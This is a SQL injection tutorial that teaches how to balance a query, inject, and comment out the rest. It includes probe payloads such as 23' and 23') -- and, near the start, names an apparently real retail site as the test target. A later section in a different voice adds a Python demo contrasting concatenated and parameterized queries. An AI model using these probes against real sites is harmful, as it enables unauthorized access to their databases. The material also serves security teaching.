Vulnerable Sites (With Syntax)

So after you have got a vulnerable site, to test if you can inject, add a ' to the end of the URL.

I'll be using this site

Code:

http://www.easystickersbanners.co.uk/banners.php?categoryid=15

09 July, 2021

Balance SQLi Query Techniques

Welcome to the third part of the basics of SQL for SQL injection. In the last part we took the URL "http://fakesite.com/report.php?id=23" as an example, assumed some basic queries by looking at the URL, tried different injections, and learnt how to figure out which type of query we are facing. In this tutorial we will learn how to work out which comment type we should use and why, and how to find the number of columns. As discussed earlier, the following are the different types of comments used in SQLi.




Well, actually it only depends on the environment and on how the application reacts when we try some commenting operators. If you see PHP is used, then usually "--" will work; otherwise you can check "--+" or "#" (URL encoded). Failing that, the best option is to try the different types of comments and analyse the output. So what we do to check is close our input with every possibility (single quote, double quote, brackets, etc.) and comment out the rest of the query; if it works, we can be sure that this comment is working. We will again take the same URL as an example:

"http://fakesite.com/report.php?id=23"

so let's see how we can check which comment to use.




So as I showed above for the "--" type comment, you can check all commenting types in the same manner. The one that gives the same output as

"http://fakesite.com/report.php?id=23"

tells you both the shape of the internal query and the comment you can use. Now that we know how to recognise the internal query and find the comment that works, let us cover the basics of injecting.

Any time, anywhere, in any application, whenever you are injecting there are three basic rules of injecting:

[1]. Balance.

[2]. Inject.

[3]. Commenting.

Understanding the first phase, "Balance":

In this phase we balance the internal query. For example, let's say that after reading Part 1 and Part 2 we understand how to assume and figure out the internal query used by the application where our input is injected, and that we figured out the internal query is "Select * from tablename where id=('23')". In this case our balance input should be 23').

The phase of Injection:

In this phase we inject as per our requirement and the type of injection we are doing.

The phase of Commenting:

Then the last part, commenting, which we already know. Now check the image below, which shows all three parts of the injection.



As per the above injection, we can assume the internal query to be:




So now let's start with our next phase. Using the "--+" comment, the SQL error is fixed, so the query is balanced successfully.
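The single-quote probe from the Basic Union Based Injection post above and the balance/comment phases described here can both be reproduced against a throwaway database, which also shows why the probe works on one code path and not the other. The following is an added Python example, not the author's code. It builds an in-memory SQLite table (constructed data; the table name and rows are assumptions) and runs the tutorial's query shape "Select * from tablename where id=('23')" two ways: built by string concatenation, and with a bound parameter.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the tutorial's 'tablename'."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE reports (id INTEGER PRIMARY KEY, title TEXT)")
    con.executemany("INSERT INTO reports VALUES (?, ?)",
                    [(22, "first report"), (23, "second report"), (24, "third report")])
    return con


def vulnerable_lookup(con, user_input):
    """Query built by string concatenation, with the shape the tutorial assumes:
    ... WHERE id=('23'). Whatever is in user_input becomes part of the SQL text."""
    sql = "SELECT title FROM reports WHERE id=('%s')" % user_input
    try:
        return [row[0] for row in con.execute(sql)]
    except sqlite3.OperationalError as exc:
        # The "add a single quote" test lands here: an unbalanced quote is a
        # syntax error, which a careless application echoes back to the user.
        return "ERROR: %s" % exc


def safe_lookup(con, user_input):
    """Same query with a bound parameter: the input is data, never SQL text."""
    rows = con.execute("SELECT title FROM reports WHERE id=(?)", (user_input,))
    return [row[0] for row in rows]


def demo():
    """Run the three probes from the tutorial through both code paths."""
    con = make_db()
    probes = {
        "normal":   "23",          # what the site expects
        "quote":    "23'",         # vulnerability check: unbalanced quote
        "balanced": "23') -- ",    # balance + comment; '--+' in a URL decodes to '-- '
    }
    return {name: (vulnerable_lookup(con, p), safe_lookup(con, p))
            for name, p in probes.items()}


if __name__ == "__main__":
    for name, (vuln, safe) in demo().items():
        print("%-8s concatenated=%r  parameterized=%r" % (name, vuln, safe))
```

Against the concatenated query the "quote" probe raises a syntax error and the "balanced" probe returns exactly the same row as the normal request, which is the signal the tutorial tells you to look for when choosing a comment type. Against the parameterized query neither probe errors and neither matches anything, because the whole string is compared as a value; that is the behaviour a defender wants to see from every endpoint.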

